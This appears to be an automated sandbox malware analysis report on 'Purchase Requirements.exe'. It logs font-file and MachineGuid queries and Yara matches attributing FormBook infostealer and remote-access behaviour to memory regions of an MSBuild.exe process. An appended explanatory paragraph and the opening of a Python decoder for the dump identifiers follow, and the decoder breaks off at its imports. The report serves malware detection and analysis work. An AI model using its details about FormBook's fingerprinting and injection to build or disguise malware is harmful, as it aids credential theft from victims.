Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
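The Yara matches listed under "Stealing of Sensitive Information" and "Remote Access Functionality" are the same set of memory dumps and unpacked PEs, and their identifiers carry the information an analyst actually needs: which process held the FormBook payload, at what base address, and with what page protection. The following decoder is an added example and not part of the original report or of any Joe Sandbox tooling. It assumes the naming convention `<process>.<run>.<timestamp>.<base>.<protection>.<type>.sdmp` for memory dumps and `<process>.<run>.<image>.<base>.<n>[.raw].unpack` for unpacked PEs, where `<process>` is the analysis-assigned process number (not the OS PID) and `<protection>` is the Win32 `PAGE_*` constant; these field meanings are assumptions, and the trailing `<type>` field is left undecoded. The sample lines are copied from the Yara section above.

```python
"""Decode Joe Sandbox Yara-match identifiers and flag executable regions.

Added example, not part of the original report. Field semantics are assumed
from the identifier naming convention (process number, run, timestamp, base
address, Win32 page protection); the trailing type field is kept raw.
"""
import re
from dataclasses import dataclass
from typing import Optional

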